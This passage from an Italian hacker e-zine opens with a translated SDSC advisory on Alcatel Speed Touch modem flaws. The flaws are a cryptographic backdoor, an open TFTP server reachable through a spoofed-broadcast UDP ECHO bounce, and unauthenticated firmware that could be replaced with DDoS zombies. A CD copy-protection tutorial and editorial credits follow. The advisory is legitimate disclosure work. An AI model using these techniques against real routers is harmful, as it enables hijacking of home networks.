'SpeedTouch (00-90-D0-00-00-00)'
e la risposta, (tipicamente un integer a 10 cifre) in questo caso è 1552815226.
Ogni dispositivo avrà un unica risposta come ha diversi indirizzi MAC,e il resto della stringa cambia talvolta tra le diverse versioni del firmware.Ne' l'algoritmo di crittazione,ne le variabili crittografiche sono stave viste cambiare tra le diverse versioni dei dispositivi o del software.
Il rischio più grande di questo sistema di risposta cifrato è che chiunque conosca l'algoritmo crittografico e le variabili usate per validare la risposta ha accesso permanente a QUALSIASI dispositivo Alcatel Speed Touch e similari. Al momento non c'è nessun modo conosciuto per disabilitare questa back door,tranne che scaricare il nostro firmware personalizzato (vedi III.C)
III.B Aprire servers TFTP - via LAN, WAN e DSLAM
Il server TFTP può essere banalmente accessito dalla LAN "interna", e l'accesso dall' "esterno" può essere solo relativamente difficile.Sembrerebbe possibile accedere al DSLAM del provider ADSL,senza bisogno di ulteriori autenticazioni.
Il dispositivo fornisce un server TFTP aperto che può essere usato per trasferire files dal e al dispositivo.Questo può essere usato per estrarre la configurazione del dispositivo o per cambiarla e,volendo,distruggere o modificare il firmware.Per esempio,un attacker, potrebbe sostituire il firmware con un codice malizioso,come un packet sniffer o un denial of service "zombie" come il Trin00 o il TFN2K.
Non c'è modo di disattivare per l'utente/propietario il server TFTP.
Non c'è,ovviamente, richiesta di autenticazione per alcun accesso TFPT.
III.B.1 Accesso via la LAN interna
Specificatamente, il server TFTP è disponibile sopra il normale UDP/IP nella rete Ethernet interna,usando un client TFTP.Usando TFTP,si potrebbe estrarre la password e altri dati di configurazione, così come la copia del firmware.
Molto più importante, si potrebbe aggiornare la configurazione,inclusa una nuova (o nessuna) password,così come un firmware modificato "maliziosamente".
III.B.2 Accesso via la WAN esterna (IP)
E' possibile attaccare dalla WAN esterna via i protocolli IP usando uno dei tanti metodi conosciuti per fare un "bounce" dei pacchetti UDP attraverso un host della rete interna.
Questo attacco può essere fatto senza problemi con l' indirizzo IP del dispositivo Speed Touch,come il default 10.0.0.138, o con l'indirizzo assrgnato allo Speed Touch dalla rete interna.
In questo modo risulta banale l'attacco attraverso, (ad esempio), un ECHO UDP.
In questo esempio, si può mandare pacchetti al server TFTP dall'esterno mandando pacchetti UDP TFTP con un indirizzo d'origine di 255.255.255.255 e una porta d'origine qualsiasi che abbia una funzione di UDP ECHO.Quando l' "ECHO srver" replica a questa richiesta, interpreterà l'indirizzo 255.255.255.255 come il broadcast locale,e il pacchetto verrà mandato alla rete Ethernet con la porta settata come TFTP UDP.
Molti dispositivi di rete (incluso lo Speed Touch) forniscono un servizio ECHO UDP, e in molti casi (anche in quello dello Speed Touch),non c'è modo di disattivare questo servizio.
Dovrebbe essere notato che lo Speed Touch Home non processa i pacchetti source-routed da default.
Tuttavia, questa opzione fornisce diverse possibilità ad un attacker.Se l'attacker ha solo accesso TFTP, (attraverso un bounce o altri metodi), potrebbe scrivere una nuova configurazione per il dispositivo che permetta il source-routing e permetta pieno accesso anche settando una nuova password o usando una back door crittografica
III.B.3 Accesso via la WAN esterna (DSLAM)
Lo Speed Touch sembra abbia i servers TFTP e SNMP in ascolto direttamente sulla WAN esterna su AAL5-encapsulated VPI/VCIs 15/16 e
15/64. Questa caratteristica probabilmente esiste per fare in modo che il provider abbia pieno accesso al dispositivo,senza alcuna forma di autenticazione.
III.C Errata autenticazione del firmware
Il dispositivo Alcatel sembra che non abbia nessun controllo dell'autenticità del firmware scaricato nello stesso.
Questa funzione rende più facile generare un firmware che venga accettato e upgradato.Questo firmware potrebbe contenere codice malizioso come un netword sniffer o un denial of service.
IV.
Non c'è nessun firewall nel A1000 o nell' Home,il che rende questi modems non sicuri da usare?
Assolutamente,no.Con la configurazione standard questi modems non permettono nessuna connessione dall'esterno verso il computer dell'utente,se non quando richiesto dalla macchina stessa.Questo significa che permette solamente i reply alla richiesta dell'utente.Tutti gli altri tentativi verrebbero bloccati.
V. Commenti e osservazioni
E' rimarchevole che per ogni metodo di accesso al dispositivo fornito (HTTP,TELNET,FTP e TFTP) sia possibile bypassare qualsiasi controllo che il propietario abbia messo in atto.
Un firmware modificato maliziosamente potrebbe portare un worm o un virus,fino ad un host della rete Ethernet interna.
VI. Alcune note sulla modalità "EXPERT"
Lo Speed Touch Home ha una modalità EXPERT che può essere usata per scoprire interessanti informazioni sui parametri della linea ADSL,le statistiche della ATM, etc. Questa modalità può essere anche per settare una grande varietà di parametri sul dispositivo e l'interfaccia,come il partizionare,formattare e cancellare il file system flash.
L'accesso a questa modalità è protetta dallo stesso sitema crittografico usato come back door per bypassare la password.
VII. Risorse
http://security.sdsc.edu/self-help/alcatel
VII. Workarounds e patches
Nessuna conosciuta al momento.
VIII. Autori
Tsutomu Shimomura
Tom Perrine
The San Diego Supercomputer Center
SDSC
is sponsored by the National Science Foundation through NPACI and by
other federal agencies, the State and the University of California,
and private organizations. For additional information about SDSC, see
http://www.sdsc.edu/
Traduzione a cura di {Cujo}
···························································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __ ___ __ __ ___ __ __| __ __ __ _|_ ___ _|_ _|_ o
(___ | ' (__/_ (__( | ' (__/_ (___ (__| |__) | ' (__) |_, (__/_ |_, |_, |
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[Titolo: Come creare cd nostri protetti dalla copia]
[Autore: Space|ce]
[e-mail: spaceice@freemail.it]
N.d.R. questo artikolo rikorda l'artikolo di Rhost sulla masterizzazione... ma questo è
trattato più approfonditamente, quindi... eccovelo! :)
******Dedicato a:******
-Me stesso che anke per oggi ho sbarcato il lunario...ehm non in questo modo!!! eheheh
-vari programmi per proteggere nostri cd, anche quelli non citati da me, che se ne avete vi
pregherei di informarmene.
-Cdrwin, che è uno dei pochi a gestire i .cue da cui come avete visto partono molte modifiche
per i layout del cd....ed anke uno dei pochi a gestire .bin.
-la donna veramente speciale che non ho ancora, e deve essere davvero speciale visto che non
l'ho ancora trovata tra le tante che abitano questo mondo!! :)
-i miei masterizzatori Yamaha e Plextor che dopo varie fantomatiche prove di ogni tipo, è come se
io e voi andassimo a mangiare una volta ogni due sere, in un ristorante messicano ed ordinassimo
sempre la pietanza + piccante, i miei Yamaha e Plextor reggono ankora benissimo...io e voi invece
reggeremo molto di meno!! :)))
--- cat NostriCDProtetti ---
#include <tuocervello.h>
#include <studiaimparamettiinpraticaepoistudiaimparamettiinpratica...h>
#define autore "Space|ce"
#define stronzate "ultimi minuti di libertà scrot scrot....buuUUUUurp...prooot...by Homer Simpsons"
int main(void);
/* Ops penso di aver sbagliato guida...eheheheheh */
Stiamo per vedere come creare cd nostri protetti dalla copia da parte di terzi,
possiamo applicare queste protezioni a qualsiasi cd di dati.
Piccola premessa...non sognatevi di creare protezioni DiscGuard o SecuRom eheh
si tratta solo di protezioni blande, che l'utente esperto riuscirebbe
a bipassare, in quanto noi ci vogliamo proteggere dal lamer idiota, non
dall'utente che ha imparato e ke mette in pratica ciò ke sa.
Cmq tutte queste protezioni bloccano la masterizzazione subito all'inizio,
sempre a causa di errori strani ke non ne permettono la creazione
dell'immagine, e assolutamente non si è in grado di creare file decriptanti
che analizzino il contenuto del cd e pongano delle firme digitali in modo
da creare si la copia masterizzata ma fallata e non eseguibile.
******Disclaimer******
Non mi ritengo responsabile dei danni che creerete al vostro computer o
a quello di altri, ai vostri cd e a qualsiasi dato contenuto in esso.
Sappiate che tali protezioni non danneggiano i vostri masterizzatori
in nessun modo, ma se dovesse accadere sicuramente è stato per un
vostro azzardo o procedura sbagliata da voi, io stesso ho provato tali
protezioni per cd, tutte legali e freeware, e non è mai capitato
nessun danno, quindi non mi assumo nessuna responsabilità in materia.
******INDICE:******
Metodo 1 - Falsi Files
Metodo 2 - Falsi Files advanced
Metodo 3 - Freelock
Metodo 4 - CD Protector
Metodo 5 - TZCopy Protection
Metodo 6 - Winlock 2000
******Metodo 1: introduzione di falsi files******
Con questo metodo, si otterrà un cd con 2 tracce dati, che produce una
tabella dei contenti illegale, ed il cd risulterà incopiabile.
Create un file di immagine del CD sull' hard-disk, ottenendo la
prima traccia in mode2.
Il file cue, avrà un aspetto simile a questo: (lo potete editare con il
notepad di windows)
FILE "C:\TEMP\IMAGE.BIN" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
Ora, far partire Cdrwin, in record disk, andare su Load Cuesheet, e leggere
il "total disc time", la durata del cd in minuti, dovrebbe essere 32.36.12,
quindi 32 minuti, 36 secondi, e 12 decimi di secondo
Adesso abbiamo il file cue che contiene le informazioni relative alla prima
traccia, dobbiamo mettere le informazioni per una seconda traccia.
modifichiamo il file cue nel seguente modo:
FILE "C:\TEMP\IMAGE.BIN" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE2/2352
INDEX 01 32:34:12 (la durata totale meno due secondi,vedremo poi il motivo)
Adesso facciamo partire Cdrwin, andiamo in record disc, quindi in disc
layout, la seconda traccia, aggiunta, parte a 32.36.12, e non a 32.34.12,
questo perchè tra una traccia e l'altra ci deve essere una pausa di 2
secondi, con questo "artificio", la seconda traccia inizia non appena la
prima termina!
A questo punto, non resta che registrare il cd con Cdrwin, nel quale avrete
due tracce dati!
Il cd funzionerà senza problemi come sempre, ma non è copiabile, a meno
ke non usiate Nero Burning Rom disattivando appunto la seconda traccia ke
in tale cdr burning viene vista anke se è attaccatissima alla prima.
Questa protezione, funzione con cd psx, pc anche in modalità mista
(mixed mode) e con cd audio, da cui i brani però potranno essere copiati
senza nessuna difficoltà con un'estrazione audio digitale, quindi non
servirebbe a niente se non ad aver sprecato tempo.
******Metodo 2: introduzione di falsi files******
Ecco un secondo metodo per creare cd protetti dalla copia, con
l'introduzione di falsi files, questa volta non saranno copiabili neppure
con Nero, e vi servirà il buon CloneCD, proprio xké abbiamo creato una prima
traccia dati seguita da una seconda fasulla in modalità diversa dalla prima
....il cd funzionerà cmq regolarmente ma la copia non verrà
assolutamente creata, dandovi parecchi errori subito all'inizio.
Eseguire il processo seguente, ma quando si modifica il file cue, invece di
aggiungere (lo potete editare con il notepad di windows)
TRACK 02 MODE2/2352
INDEX 01 32:34:12
cambiare la prima riga in "track 02 mode1/2352", la seconda resta
inalterata, più in generale, bisogna mettere la seconda traccia in modo che
venga scritta in modalità diversa dalla prima, ad esempio se la prima
traccia è mode1, la seconda sarà mode2, o viceversa!
Il file ke diventerà alla fine:
FILE "C:\TEMP\IMAGE.BIN" BINARY
TRACK 01 MODE2/2352
INDEX 01 00:00:00
TRACK 02 MODE1/2352
INDEX 01 32:34:12
Vi segnalo questo programma per editare i file cue:
"CDRCue Cuesheet Editor" (http://www.dcsoft.com/prod03.htm)
******Metodo 3: Freelock******
materiale richiesto:
-Cdrwin (lo trovate ovunque)
-Freelock (ops non c'è nessun url ehm..chiedetemelo)
-1 floppy 3.5" vuoto (lo trovate in qualsiasi negozio, supermercato, tabacchi, macellerie :) ...by vobis pub)
Freelock è un programmino che altera il layout del cd, prima della masterizzazione,
rendendo la copia difficile.
Scompattate freelock in una directory. Ora vi serve un floppy da 1.44 Mb,
formattato, (senza nessun dato) e non protetto dalla scrittura.
Andate nella directory in cui avete scompattato il file, e lanciate il file
INSTALL.BAT, il dischetto, a questo punto, conterrà due file: Freelock.exe
e Freelock.txt
Adesso, fate partire Cdrwin, e create un file immagine, memorizzatelo in
una cartella qualsiasi. Mettete un cd vergine nel masterizzatore, abbiamo
ora due file nella directory in cui avete messo l'immagine: "image.bin" ed
"image.cue", dove image sta per il nome dell'immagine che avete scelto.
Ora andate al prompt del dos e digitate:
A:\freelock image.cue e quindi premere INVIO sulla tastiera
Come prima, image è il nome dell'immagine
Ora, con Cdrwin, create il Cd, lasciando il dischetto nel floppy, alla fine
della scrittura, verrà dato un messaggio di errore, non vi preoccupate, ora
il cd è protetto.
Ovviamente tale protezione è scansabile, potete esarla sia su cd psx ke pc.
******Metodo 4: CD Protector******
materiale richiesto:
-Nero (lo trovate ovunque)
-CD Protector (http://surf.to/nrgcrew)
-1 cd vergine da 650Mb o 700Mb (lo trovate ovunque, anche per strada e soprattutto nei parabrezza e
nei lunotti posteriori delle auto :)) )
All'inizio vi avevo detto che non era possibile creare programmi criptati che
analizzassero il cd copiato e non lo facessero eseguire, beh questo programma
è un po' la dimostrazione che mi sbagliavo, si deve utilizzare solo in accoppiata
con Nero.
Dunque attivate il programma CD Protector (lo notate attivo anche sulla traybar)
nella casella "File to encrypt:" dovete metterci il file .exe che viene utilizzato
per avviare il gioco o il programma, insomma quello usato per avviare il vostro
cd dati (install.exe, setup.exe, autorun.exe, uno solo di questi, badate il cd dati
su hdd deve essere già pronto, non create la protezione prima ancora di fare il cd
dati!!), attenzione il file exe deve essere un eseguibile in formato Win9x conforme
allo standard PE EXE,qualsiasi altro exe non verrà accettato.
In "Custom Message:" scrivete invece un testo a piacere che comparira all'utente
che avrà fatto una copia fallata del vostro cd protetto, potete metterci "Ti ho
fregato brutto rippatore!!" o "CD Protetto da SpaceCDGuard questa copia non è
autorizzata", insomma quel che volete che si attivi nelle copie non autorizzate
del vostro cd.
Poi in "Phantom Trax directory:" dovete selezionare una directory qualsiasi che volete
in cui verra creato un file wave fasullo (è il file di verifica del codice criptato
del cd), ci servirà dopo con Nero.
In "Encryption Key:" ci dovete mettere una chiave di criptazione in esadecimale, un
qualsiasi valore da 00 a FF, il programma consiglia 1A, ma potete metterci tutte
quelle che volete e soprattutto cambiatela da cd a cd protetto.
Fatto tutto ciò premete sul tasto ACCEPT! che dovrebbe essersi illuminato di rosso, e
noterete che nella cartella che avevate scelto per Phantom Trax c'è un file wave di
nome "Track#1 - Track#2 Cd-Protector" mentre nella vostra compilation del cd dati,
noterete che il file .exe è stato modificato e sono comparsi 4 file nuovi _cdp16.dat,
_cdp16.dll, _cdp32.dat e _cdp32.dll (eheheh si assomigliano molto alla protezione
Safedisc, forse chi ha programmato tale cd protector ne ha preso spunto).
Ora mettete il cd vergine nel masterizzatore (vi dovremmo scrivere più volte in
modalità multisessione, se non sapete cos'è, male!).
Poi attivate Nero e selezionate "Nuova Compilation" (New Compilation) per creare
un "CD Audio", cliccate sul menu a tendina "Opzioni CDA" (CDA-Option) e controllate
che siano spuntate le due caselle in fondo "Ottimizza la traccia su disco prima
della scrittura" (Cache the track on harddisk before burning) e "Rimuovi silenzio
alla fine delle tracce .cda" (Remove silence at the end of *.cda tracks), se non
lo sono fatelo.
Poi cliccate nel menu tendina "Scrivi" (Burn) e sotto Azioni (Action) selezionate
solo la casella "Scrivi" (Write) tutte le altre di questa sezione deselezionatele
soprattutto la simulazione (simulation) e chiudi cd (finalize CD), per deselezionare
quest'ultima da Nero 5 in su, si deve prima spuntare la casella "Usa Masterizz. Multipli"
dopo vi sarà possibile deselezionare la casella chiudi cd.
Sempre nelle stessa finestra deselezionate anche la modalità Disc-At-Once e come
velocità di scrittura rimanete sui 4x, deselezionate anche tutte le caselle in
fondo sulle ottimizzazioni file.
Quindi date l'ok, prendete il precedente file wave finto, dalla directory Phantom Trax
e mettetelo nella compilation e masterizzate il cd, poi ripete la procedura sempre
sullo stesso cd con lo stesso wave finto, e lo rimasterizzate si lo stesso cd, in
quanto non lo avete chiuso, e si tratta di una multisessione, alla fine
se andrete in "Mostra Tracce" (Select Tracks) in Nero noterete due tracce audio.
Fatto ciò ora attivate una nuova compilation, e questa volta scegliete "CD-Rom ISO"
andate nel menu tendina "Multisessione" (Multisession) e cliccate su "Inizia a
scrivere un disco in multisessione" (start multisession disk), poi andate nel menu
tendina "Scrivi" (Burn) e deselezionate le caselle chiudi cd e la modalità Disc-At-One.
Quindi date ok, e poi includete tutto il vostro cd dati già modificato da CD Protector
con il file exe criptato, fatto ciò potete avviare la masterizzazione e il gioco è
concluso.
C'è da notare un contro in questa procedura, perché il cdrom che abbiamo creato è un
cd multisessione in modalità mista audio e dati, e vecchi lettori cdrom ide (presumo da
16x in giù) non leggono cd multisessione,a meno che non sia specificato diversamente
nei suoi dati tecnici.
Comunque tutti i masterizzatori sono invece in grado di leggere cd multisessione, ma
che tipo di protezione abbiamo creato con tale programma? bene è mia convinzione che
questo programma cripti l'eseguibile principale di avvio con una chiave il cui codice
è il file wave fasullo, il secondo file wave fasullo = sicuramente serve come verifica
per il primo, tali file wave sono di una dimensione fissa di 1.44Mb circa l'uno, quindi
vi portano via 2.88Mb dal cdrom e se provate ad ascoltarli funzionano, e si sentono vari
suoni tra i quali un grugnito eheheh, il tutto di una durata di neanche 8 secondi, ma se
provate ad aprirli con un editor esadecimale (debug) si notano molte stringhe criptate.
Dunque se provate a copiare tale cd protetto, verrà copiata solo la traccia dati che non
trovando quelle audio non farà partire niente tranne il messaggio che avevate selezionato
prima, se poi pensate di copiare le tracce audio singolarmente e poi quella dati, niente da
fare ancora perché i file _cdp16.dat ecc..ecc (i 4 ke avevo spiegato su) vengono copiati
ma non in modo fisico quindi vengono modificati nella copia.
Unico modo per copiare tutto il cd è il CloneCD (anche se l'ultima versione di CD Protect
4 beta ancora non disponibile, crea errori anche con CloneCD) oppure copiare i singoli
dati, a meno che non abbiate studiato un prg di decompressione con password attivato
dal programma di avvio criptato (proprio come i cd twilight, i quali però ne permettono
la masterizzazione di tutto il cd ma non l'estrazione di tutti i singoli programmi).
Attenzione tale protezione è utile solo con cdrom dati per PC, assolutamente da non provare
con cd PSX, non partirebbero, o con cd audio, non servirebbe a niente perché esiste l'estrazione
audio...e poi spiegatemi come fate a criptare un file exe di avvio in un cd audio :)))
******Metodo 5: TZCopy Protection******
materiale richiesto:
-Cdrwin (lo trovate ovunque)
-TZCopy Protection (http://members.nbci.com/tzcopy/index.html)
-file .iso o .bin
-file .cue
Questo programma è una suite (raccolta) di varie protezioni, selezionabili una alla volta con
possibilità di metterle tutte, occorre creare un'immagine del vostro cd dati con Cdrwin in formato
.bin o .iso, che a sua volta creerà anche il solito secondo file .cue.
Dunque le protezioni selezionabili sono:
1) Modifica della struttura del CD per proteggerlo dai più popolari programmi di masterizzazione.
2) Inserimento di 4 tracce audio oltre a quella nostra dati. (multisessione fasulla)
3) Modifica della dimensione (solo a livello di indice TOC) di un file eseguibile o fittizio che
volete voi fino a 900Mb.
Avviate TZCopy Protection cliccate su bottone "Open Cue" andate nella directory in cui è la vostra
immagine e selezionate il file .cue, poi cliccate su "Viewer" sempre nella stessa directory dove
avete messo la vostra immagine selezionate il .bin o .iso a seconda del formato che avevate
scelto in Cdrwin, dovrebbe ora comparirvi una lista dei file e directory del vostro cd dati.
Per proteggerlo e attuare le modifiche basta che cliccate su "Step 1 secret" per la protezione 1,
"Step 2 Second Data Track" per la protezione 2 dopo che avrete selezionato un file, e
"Step 3 file modificator" per la protezione 3 dopo che avrete selezionato un file.
Eseguite tutte le modifiche riprendete Cdrwin e masterizzate l'immagine modificata, avrete un cd
con un bel po' di protezioni, scansabili comunque con Nero o altro prg estrattore di tracce in
formato raw.
Tali protezioni si possono applicare a qualsiasi cdrom per PC, PSX e audio senza problemi, in
quest'ultimo caso però non serve a niente.
******Metodo 6: Winlock 2000******
materiale richiesto:
-Cdrwin (lo trovate ovunque)
-Winlock 2000 (http://www.diamondcdroms.co.uk)
-file .cue
Anche questo programma non fa poi molto, come TZCopy si limita a modificare il cue file in modo
da generare un layout cd diverso dall'originale, in dettaglio il programma crea 3 tracce nuove,
una audio, una in mode1 e una in mode2 attraverso un file fasullo creato da Winlock.
Dopo aver creato l'immagine .bin e il suo .cue in automatico, aprite winlock e cliccate su
"Create File" serve al programma per creare il file fasullo, poi cliccate su "CueSheet" e impostate
il file *.cue della vostra immagine cd, ora lasciando attivo Winlock, andate su Cdrwin selezionate
l'immagine cd già modificata e cominciate a masterizzarla, poi tornate in Winlock e cliccate su
"Modify" il quale modificherà il file fasullo, Cdrwin dopo un po' darà un errore, non preoccupatevi
dategli ok e il tutto è concluso. Vi chiederete...e così ho mandato a puttane il cd...NO..eheheh
i vostri dati sono già stati registrati senza problemi, vi spiego cosa è successo...Cdrwin
registra prima i vostri dati, poi comincia a registrare le 3 tracce miste al cui interno
dovrebbe andare il file fasullo, ma quando Cdrwin comincia la registrazione prende subito in esame
il file cue che gli dice la dimensione di tali 3 tracce e del file fasullo, ma se questo viene
modificato in dimensione durante tale registrazione causa un errore e non viene scritto, ma le
3 tracce sono state scritte, quindi se provate a copiare tale cdrom, qualsiasi programma di
masterizzazione si fermerà subito perché vedrà tali 3 tracce in modo non standard e si rifiuterà
di creare qualsiasi immagine di tale cd.
Il vostro cd in questo modo è protetto, ma non al 100%, con un qualsiasi programma che estrae le
singole tracce si può velocemente individuare l'unica funzionante e basterebbe copiare solo quella.
Tale protezione è applicabile su cdrom per PC e PSX (audio non ve lo metto più xké spero abbiate
capito che non serve a niente proteggere questi!!).
--- EOF NostriCDProtetti ---
···························································································
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __ __ __ | __ o __ __ ___
(___ (__) | ) (___ |_, (__(_ __) | (__) | ) (__/_
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
[ Titolo: L'abbiamo finita!? :o) ]
[ Autore: Cookbooker ]
E finisce kosì anke il sekondo numero di Underground Magazine (ke potete trovare su
umcrew.tsx.org), numero karatterizzato da molte novità (nuove sezioni, nuovi corsi e
nuovi collaboratori) e da artikoli, a mio parere, interessanti :)
Ora sono stanko, ho finalmente finito di impaginare (bene o male ;) sto numero...
vi saluto, in attesa del terzo numero di una zine ke kontinua a crescere... ma ci sarà
un terzo numero? :0o
Non c'è 2 senza 3!
spero... ;o)
ßyeZ, Cookbooker.
Hanno kollaborato per la realizzazione di questo numero:
Ruolo Nickname e-mail
-----------------------------------------------
Redattore: Cookbooker Cookbooker@libero.it
Collaboratori: >FeltonSpray ????????????????
>Rhost rhost@post.com
>Cujo ????????????????
>EvilAngel ????????????????
>Ulisses1 ????????????????
>Freesto huhii@tin.it
>Jrash ????????????????
>SpaceIce ????????????????
----------------------------------------------
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××
__ __| __ __ __ __ __ __ __| __ __ __ __ __ __ o __ __
(__( | ) (__| (_/_ | ' (__| | ' (__) (__(_ | ) (__| | ) ) (__( (__| (__( (__ | | ) (_/_
__/ __/
_____ _ __ _ _____
| ___| | | | \ | | | ____|
| |__ | | | \| | | |__
| __| | | | |\ | | __|
| | | | | | \ | | |___
|_| |_| |_| \_| |_____|
×××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××